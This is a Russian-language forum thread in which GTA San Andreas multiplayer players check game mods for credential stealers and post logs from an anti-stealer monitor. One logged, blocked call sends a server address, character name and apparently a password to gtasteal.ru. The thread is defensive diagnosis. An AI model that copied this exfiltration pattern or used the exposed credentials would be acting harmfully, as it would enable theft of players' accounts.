™ ChipFamily
По ту сторону надежды.
- 5,141
- 1,996
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Эту проблему не решить. просто удали AntiStealer.Блокирует скриптовые чаты, нот гуд.
Эту проблему не решить. просто удали AntiStealer.Блокирует скриптовые чаты, нот гуд.
CLEO.asi - стиллер.samp.dll стиллер? И вообще есть ли стиллеры я не шарю прост
Блокирует скриптовые чаты, нот гуд.
Конечно будет блокировать. Он же не делит скрипты на "опасные" и "безопасные". Его цель - предотвратить отправку данных на интернет-сервер.Эту проблему не решить. просто удали AntiStealer.
Не CLEO.ASI, а в CLEO скрипте.CLEO.asi - стиллер.
[PATCHED] > [URLDownloadToFileA] > [D:\Games\GTA SA\CLEO.asi] > {szURL: http://gtasteal.ru/ucp/include/0SM8Fdkhji.php?data=185.169.134.43:7777=Arizona RP | Scottdale | X2 Payday!=Norman_Ridd=2=GrenA235=275 | szFileName: %TEMP%\2352sfa.tmp}
Сейчас у современных стиллеров стоит защита от снифaеров, анализаторов трафика.Кароче такая хуйня: через протекту чекал, стиллера нет, но есть скрипты с закрытым кодом. Угнали акк, ничо не спиздили всё восстановил.
Спиздили на дрп, на эвольве не трогали, хм.
Через wireshark чекал какое-то говно не рабочее видимо, даже установив 100% стиллер ничо не нашёл он. делал всё правильно.
установив этот анти стиллер, установив стиллер патчт пошёл на левый файл . шо це таке
А как тогда заскриптованные файлы проверять ? avp не реагирует, от пикселя тоже, хотя стиллер есть 100%. как-то же сука взломалиСейчас у современных стиллеров стоит защита от снифaеров, анализаторов трафика.
WireShark, HTTP Analyzer и многое другое.
Так что нету смысла проверять этими программами.
содержимое всего лога кидай, а не рандомный кусок.А как тогда заскриптованные файлы проверять ? avp не реагирует, от пикселя тоже, хотя стиллер есть 100%. как-то же сука взломали
[WARNING] > [gethostbyname] > [C:\Users\PC\Desktop\GTAFORFILM\samp.dll] > {name: PC-ПК}
[WARNING] > [gethostbyname] > [C:\Users\PC\Desktop\GTAFORFILM\samp.dll] > {name: XXX}
[WARNING] > [gethostbyname] > [C:\Users\PC\Desktop\GTAFORFILM\samp.dll] > {name: XXX}
[PATCHED] > [SetFileAttributesA] > [C:\Windows\system32\WININET.dll] > {lpFileName: C:\Users\PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ | dwFileAttributes: 8198}
[PATCHED] > [SetFileAttributesA] > [C:\Windows\system32\WININET.dll] > {lpFileName: C:\Users\PC\AppData\Roaming\Microsoft\Windows\Cookies\ | dwFileAttributes: 8198}
[PATCHED] > [SetFileAttributesA] > [C:\Windows\system32\WININET.dll] > {lpFileName: C:\Users\PC\AppData\Local\Microsoft\Windows\History\History.IE5\ | dwFileAttributes: 8198}
[WARNING] > [InternetOpenUrlA] > [C:\Users\PC\Desktop\GTAFORFILM\SAMPFUNCS.asi] > {lpszUrl: http://service.blasthack.net/sf_sta...CCF30466&x=B9909B053E5CD06910E320FA43440F5E5D}
[WARNING] > [getaddrinfo] > [C:\Windows\system32\WININET.dll] > {pNodeName: PC-ПК}
[WARNING] > [GetAddrInfoW] > [C:\Windows\system32\WS2_32.dll] > {pNodeName: PC-
Вот лог, где-то сука же есть стиллер.
Нету стиллеров.Есть?
Чист.есть ли у меня стеллеры?
спс,можешь ещё объяснить,что это за троян? Вредит ли он пк или нет? Знаю что это стиллер,ну просто интересно,спросил.Чист.
Это как я понимаю файл из собейта SlonoBoyko, не советую ставить его собейт. Говорят он в последних обновлениях подкачивает какую-то фигню.спс,можешь ещё объяснить,что это за троян? Вредит ли он пк или нет? Знаю что это стиллер,ну просто интересно,спросил.
![]()
Вот файл сам,не советую ставить на сборку,а то не удалите(написал создатель)